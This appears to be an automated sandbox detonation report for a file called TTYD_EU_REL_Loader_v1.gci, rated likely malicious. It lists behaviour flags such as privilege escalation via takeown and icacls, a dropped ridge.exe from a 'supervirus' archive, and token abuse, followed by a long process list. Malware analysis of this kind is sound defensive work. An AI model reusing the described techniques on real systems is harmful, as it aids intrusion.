Analysis Overview
SHA256
1c34cd45dd2bb8c44a48d60aea5e0ce811ae416b220361c8e35e7411e8801379
Threat Level: Likely malicious
The file TTYD_EU_REL_Loader_v1.gci was found to be: Likely malicious.
Malicious Activity Summary
Nirsoft
Possible privilege escalation attempt
Executes dropped EXE
Modifies file permissions
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
NTFS ADS
Modifies registry class
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-27 20:20
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-27 20:20
Reported
2024-06-27 20:25
Platform
win10v2004-20240611-en
Max time kernel
183s
Max time network
273s
Command Line
Signatures
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\supervirus.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\TTYD_EU_REL_Loader_v1.gci
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\TTYD_EU_REL_Loader_v1.gci"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=CFBCF1380BEE61173CB3F81F9CCC97E6 --mojo-platform-channel-handle=1728 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=CC299BA5F0D602EB9F0C28C9BD05A5D7 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=CC299BA5F0D602EB9F0C28C9BD05A5D7 --renderer-client-id=2 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BC6F5347C931E4D98644DB41A6D02116 --mojo-platform-channel-handle=2312 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A8577161FB3B664D37B7AE78449ABDDD --mojo-platform-channel-handle=2508 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6F57F8761F126705BFBDF6946394E9C5 --mojo-platform-channel-handle=1736 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.0.1841194680\1606962271" -parentBuildID 20230214051806 -prefsHandle 1820 -prefMapHandle 1812 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6355d52e-16a8-454e-a7a8-db8ca837c226} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 1900 1bf21105c58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.1.548472827\2008355691" -parentBuildID 20230214051806 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e4613bd-254c-43d9-b950-c1ca3e2870fd} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 2468 1bf1448ab58 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.2.366773303\1635616079" -childID 1 -isForBrowser -prefsHandle 1584 -prefMapHandle 2812 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d61a0634-af18-4180-b145-d0bb8ee29f9a} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 1564 1bf24116558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.3.2077564674\1643910090" -childID 2 -isForBrowser -prefsHandle 4120 -prefMapHandle 4116 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {33e58a01-72db-4920-883a-35dd84aaf152} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 4132 1bf1447ab58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.4.1542839662\854563694" -childID 3 -isForBrowser -prefsHandle 4996 -prefMapHandle 5000 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3834455-c718-4a20-9608-360f071b5280} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 4944 1bf27e4e858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.5.1254738678\1327137358" -childID 4 -isForBrowser -prefsHandle 5148 -prefMapHandle 5152 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82e18c5d-98d9-47b1-a1fb-b3d3f2c607d6} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 5136 1bf27e4fd58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.6.1343550622\1985077459" -childID 5 -isForBrowser -prefsHandle 5372 -prefMapHandle 5316 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7888ef2d-afa5-4706-8664-af9fdb0f00e8} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 5360 1bf27e50c58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.7.2125030608\895906793" -childID 6 -isForBrowser -prefsHandle 4448 -prefMapHandle 4500 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c22b542c-c83e-4eb4-85aa-4ca21dcf7bc0} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 5908 1bf270d0258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.8.2104756379\1032501123" -parentBuildID 20230214051806 -prefsHandle 6120 -prefMapHandle 4420 -prefsLen 27776 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b846c4dc-42b0-4e9a-ba56-77eedcf8b919} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 6136 1bf25dc6258 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.9.515008306\2113160611" -childID 7 -isForBrowser -prefsHandle 10272 -prefMapHandle 10276 -prefsLen 28041 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cd1fc8bb-075d-4af0-b35a-939006fe5a91} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 1600 1bf2736c858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.10.1466635449\2027421123" -childID 8 -isForBrowser -prefsHandle 9916 -prefMapHandle 5544 -prefsLen 28177 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {af3e4438-fa68-42ae-8c98-afb4cbe14be7} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 9904 1bf2b17c958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.11.536516322\904925067" -childID 9 -isForBrowser -prefsHandle 9788 -prefMapHandle 9780 -prefsLen 28177 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ddd59ceb-8efb-4b53-9bfe-9db39097b11b} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 9680 1bf2b73a558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.12.514845600\2068559563" -childID 10 -isForBrowser -prefsHandle 9352 -prefMapHandle 9348 -prefsLen 28177 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {78a917f1-ef6d-4119-8cb5-9510ee9519a3} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 9364 1bf2b710b58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.13.307730423\2101878358" -childID 11 -isForBrowser -prefsHandle 9204 -prefMapHandle 9200 -prefsLen 28177 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {354af93d-db46-44e5-94df-629960cfdb83} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 9224 1bf2b710258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.14.953601099\196250908" -childID 12 -isForBrowser -prefsHandle 9040 -prefMapHandle 9036 -prefsLen 28177 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {da69b73f-4d85-4b10-adc7-40b0fc490530} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 9048 1bf2b70fc58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.15.1089419017\1041642454" -parentBuildID 20230214051806 -sandboxingKind 1 -prefsHandle 9004 -prefMapHandle 9008 -prefsLen 28177 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dfa703bf-4f03-4eb0-a166-7eadac5c279a} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 8988 1bf2cb9d558 utility
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4bc 0x394
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.16.310602955\304282635" -childID 13 -isForBrowser -prefsHandle 8656 -prefMapHandle 8592 -prefsLen 28229 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42380b7a-addd-4852-be91-ceba3811d513} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 8544 1bf2ced7958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.17.127940592\1172234117" -childID 14 -isForBrowser -prefsHandle 8300 -prefMapHandle 8304 -prefsLen 28229 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {77bc1b21-fb1a-45aa-b58f-be5cd8066f87} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 8340 1bf2999b058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.18.1754118501\1183478284" -childID 15 -isForBrowser -prefsHandle 8340 -prefMapHandle 8264 -prefsLen 28388 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {23486cac-2983-4e4f-b6e7-5aef2212c81d} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 8228 1bf2cf3ae58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.19.41562592\1940410545" -childID 16 -isForBrowser -prefsHandle 8040 -prefMapHandle 8044 -prefsLen 28388 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb62480c-4e39-4fe2-887a-566531bd8485} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 7996 1bf21833b58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.20.1472959039\1233373036" -childID 17 -isForBrowser -prefsHandle 7824 -prefMapHandle 7816 -prefsLen 28388 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c97ba4b8-5408-4b88-a4c6-6189e5a2de6c} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 7736 1bf21834a58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.21.778888713\1505377138" -childID 18 -isForBrowser -prefsHandle 7816 -prefMapHandle 7824 -prefsLen 28599 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dc101f05-147a-46f9-8686-376c1399e65e} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 7964 1bf2d2fdb58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.22.1657299228\3866851" -childID 19 -isForBrowser -prefsHandle 7392 -prefMapHandle 7396 -prefsLen 28653 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b27595e2-8578-482c-a2de-40ed5b4c6216} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 7504 1bf2d2d5058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.23.1337418773\816690257" -childID 20 -isForBrowser -prefsHandle 7492 -prefMapHandle 7488 -prefsLen 28811 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f5be38cd-55b4-4427-82bc-90652e68d474} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 7468 1bf2c439c58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.24.279569352\1044975757" -childID 21 -isForBrowser -prefsHandle 7032 -prefMapHandle 7024 -prefsLen 28811 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b238e3d4-3eaa-42fa-ac23-5da1adaaf4b8} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 7040 1bf25586e58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.25.1011877238\1674161068" -childID 22 -isForBrowser -prefsHandle 7656 -prefMapHandle 6708 -prefsLen 28851 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a7eeda9a-d610-4ae0-b5c3-de854bf1418c} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 6696 1bf27d31358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.26.124209332\35832364" -childID 23 -isForBrowser -prefsHandle 6360 -prefMapHandle 10356 -prefsLen 28851 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {45f83520-cd04-46cc-9ff9-350a9b0b6490} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 10364 1bf29552358 tab
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\supervirus\Funkin.exe
"C:\Users\Admin\Downloads\supervirus\Funkin.exe"
C:\Windows\system32\cmd.exe
